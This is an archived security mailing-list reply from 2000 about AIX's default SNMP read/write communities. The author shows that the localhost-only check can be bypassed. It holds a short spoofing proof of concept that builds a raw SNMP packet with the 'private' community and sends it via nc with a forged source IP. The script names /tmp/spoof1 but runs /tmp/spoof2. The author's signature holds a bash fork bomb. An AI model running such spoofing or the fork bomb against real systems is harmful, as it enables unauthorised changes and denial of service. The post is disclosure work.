On Tue, 15 Feb 2000, harikiri wrote:
> It appears that on the above releases of AIX, the SNMP daemon is
> enabled by default and two community names are enabled with read/write
> privileges. The community names are "private" and "system", but are
> only allowed from localhost connections. Nevertheless, a local user
> may install an SNMP client, and modify sensitive variables.
SNMP requests with no authentication except for source-IP comparsion, are
spoofable.
--snip--
#!/bin/bash
cat >/tmp/spoof1.c <<_EOF_
char
private[]="0\202\0-\2\1\0\4\7private\243\37\2\1\1\2\1\0\2\1\0000\0240\202"
"\0\20\6\10+\6\1\2\1\1\4\0\4\4null";
main() { write(1,private,sizeof(private)); }
_EOF_
gcc -o /tmp/spoof1 /tmp/spoof1.c
/tmp/spoof2 | nc -s FakeSourceIPHere -u RemoteIPHere 161
--snip--
UDP blind spoofing, nothing easier.
_______________________________________________________
Michal Zalewski * [lcamtufat_private] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:35:37 PDT